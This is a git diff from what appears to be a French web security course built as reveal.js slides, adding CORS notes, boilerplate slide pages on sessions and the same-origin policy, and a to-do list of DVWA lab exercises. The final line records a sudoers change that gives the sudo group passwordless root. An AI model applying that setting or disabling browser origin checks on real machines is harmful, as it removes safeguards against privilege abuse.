+ * [<i class="fab fa-stack-overflow"></i> Disable firefox same origin policy](http://stackoverflow.com/questions/17088609/disable-firefox-same-origin-policy)
+
+Note:
+- l'introduction de cette nouvelle possibilitĂ© implique nĂ©cessairement que les serveurs doivent gĂ©rer de nouvelles entĂȘtes, et doivent renvoyer les ressources avec de nouvelles entĂȘtes Ă©galement
+- doit ĂȘtre supportĂ© par le navigateur
+- la valeur * est possible mais risquée
+- requĂȘtes simples, prĂ©-vĂ©rifiĂ©es avec le verbe OPTIONS, avec habilitations en forcant l'envoie du cookie
diff --git a/content/slides/1337/session.html b/content/slides/1337/session.html
new file mode 100644
index 0000000000000000000000000000000000000000..0a85358a12c181c60b796530d3dfc3c06e723257
--- /dev/null
+++ b/content/slides/1337/session.html
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>Session</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/session.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/sop.html b/content/slides/1337/sop.html
new file mode 100644
index 0000000000000000000000000000000000000000..8c0f65938d4b3d80a1dda593bd14bc3cab2683d6
--- /dev/null
+++ b/content/slides/1337/sop.html
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>SOP</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/sop.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/main.css b/content/slides/main.css
index b7f8cb421d1272cd1340dfade07bcc336ca111d4..f7370428ec7de3efdacbd92539639c6fbe6f6c13 100644
--- a/content/slides/main.css
+++ b/content/slides/main.css
@@ -75,4 +75,12 @@ reveal code {
.fa-book-skull, .fa-screwdriver-wrench {
color: grey;
+}
+
+code:not([class]) {
+ background-color: darkgrey;
+ border-radius: 5px;
+ padding: 5px;
+ font-size: 80%;
+ color: white;
}
\ No newline at end of file
diff --git a/notes.md b/notes.md
index f6e0c929fae3a217ebbb528a4e57f2d82e37bbd3..fb839634391f02f03effa045448797dd366090f1 100644
--- a/notes.md
+++ b/notes.md
@@ -5,8 +5,7 @@
* faire le challenge DVWA CSP aprĂšs XSS ajouter SOP et CORS => virer ou vider Browser
* faire le challenge captcha aprĂšs CSRF
* reprendre le code du gist dans http et dans CSP pour faire des fetch dignes
-* reprendre la doc pour faire fonctionner kali avec les vieilles Vms avec virtualBox 7
- * Heartbleed / ShellShock / Drupalgeddon
+ * faire relire js Ă @tibertra & @thlecoub
##
sudo vi /etc/sudoers -> %sudo ALL=(ALL:ALL) ALL -> %sudo ALL=(ALL) NOPASSWD:ALL